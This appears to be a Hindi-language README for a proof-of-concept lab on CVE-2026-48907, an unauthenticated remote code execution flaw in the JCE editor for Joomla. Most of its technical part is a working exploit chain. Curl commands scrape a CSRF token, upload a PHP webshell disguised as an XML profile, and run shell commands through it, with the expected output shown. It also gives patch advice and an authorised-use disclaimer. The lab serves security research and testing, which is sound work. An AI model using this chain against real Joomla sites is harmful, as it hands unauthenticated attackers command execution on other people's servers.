
CVE-2026-48907 के लिए POC
PSsec CVE-2026-48907 के लिए शैक्षिक सुरक्षा अनुसंधान लैब।
CVE-2026-48907 एक गंभीर (CVSS 10.0) बिना प्रमाणीकरण वाली रिमोट कोड निष्पादन भेद्यता है, जो JCE (Joomla Content Editor) में है, जो Joomla के लिए सबसे व्यापक रूप से स्थापित संपादक एक्सटेंशन है, और सभी संस्करणों ≤ 2.9.99.4 को प्रभावित करती है।
profiles.import एंडपॉइंट बिना किसी प्रमाणीकरण के फ़ाइल अपलोड स्वीकार करता है। एक हमलावर XML प्रोफ़ाइल के रूप में छिपी हुई दुर्भावनापूर्ण PHP फ़ाइल अपलोड कर सकता है, जो सर्वर की tmp/ निर्देशिका में लिखी जाती है और HTTP के माध्यम से सीधे निष्पादित होती है — कोई क्रेडेंशियल आवश्यक नहीं है।
| विवरण | मान |
|---|---|
| CVE | CVE-2026-48907 |
| CVSS स्कोर | 10.0 गंभीर |
| प्रभावित संस्करण | JCE ≤ 2.9.99.4 |
| ठीक किए गए संस्करण | JCE ≥ 2.9.99.5 |
| CISA KEV सूचीबद्ध | हाँ — 16 जून, 2026 |
| सक्रिय रूप से शोषित | हाँ |
docker compose up -d
अपने ब्राउज़र में http://localhost:8080 खोलें और इन क्रेडेंशियल्स का उपयोग करके सेटअप विज़ार्ड पूरा करें:
| फ़ील्ड | मान |
|---|---|
| डेटाबेस होस्ट | db |
| डेटाबेस नाम | joomla |
| डेटाबेस उपयोगकर्ता | joomla |
| डेटाबेस पासवर्ड |
wget https://github.com/widgetfactory/jce/releases/download/2.9.99.4/pkg_jce_29994.zip
फिर Joomla Admin में System → Extensions → Install → ZIP अपलोड करें।
URL=http://localhost:8080
TOKEN=$(curl -s -c cookies.txt "$URL/" \
| sed -n 's/.*"csrf\.token"[[:space:]]*:[[:space:]]*"\([a-f0-9]\{32\}\)".*/\1/p; s/.*name="\([a-f0-9]\{32\}\)"[^>]*value="1".*/\1/p' \
| head -n1)
curl -i -s -b cookies.txt -c cookies.txt \
-F "[email protected];type=application/xml" \
-F "task=profiles.import" \
-F "${TOKEN}=1" \
"$URL/index.php?option=com_jce"
curl -i -s -b cookies.txt -c cookies.txt \
"$URL/tmp/shell.xml.php?cmd=id"
अपेक्षित आउटपुट: uid=33(www-data) gid=33(www-data)
| फ़ाइल | विवरण |
|---|---|
docker-compose.yml | असुरक्षित Joomla 5.3.1 + MySQL 8.0 तैयार करता है |
shell.xml.php | न्यूनतम PHP वेबशेल पेलोड |
instructions.txt | चरण-दर-चरण शोषण नोट्स |
JCE को तुरंत संस्करण 2.9.99.5 या बाद के संस्करण में अपडेट करें।
पुराने Joomla संस्करणों के लिए आधिकारिक विक्रेता सलाह और निःशुल्क पैच: JCE Security Update — joomlacontenteditor.net
यह रिपॉजिटरी केवल शैक्षिक और अधिकृत सुरक्षा अनुसंधान उद्देश्यों के लिए है।
परीक्षण केवल उन प्रणालियों पर किया जाना चाहिए जिनके आप स्वामी हैं या जिनके परीक्षण के लिए आपके पास स्पष्ट लिखित अनुमति है। उन प्रणालियों के विरुद्ध इस सामग्री का अनधिकृत उपयोग जिनके आप स्वामी नहीं हैं, अवैध और अनैतिक है। लेखक और Pansophical OU इस सामग्री के दुरुपयोग के लिए कोई दायित्व स्वीकार नहीं करते हैं।
यह लैब वातावरण जानबूझकर असुरक्षित है। इसे इंटरनेट या किसी भी अविश्वसनीय नेटवर्क पर एक्सपोज़ न करें।
PSsec द्वारा
joomlapass |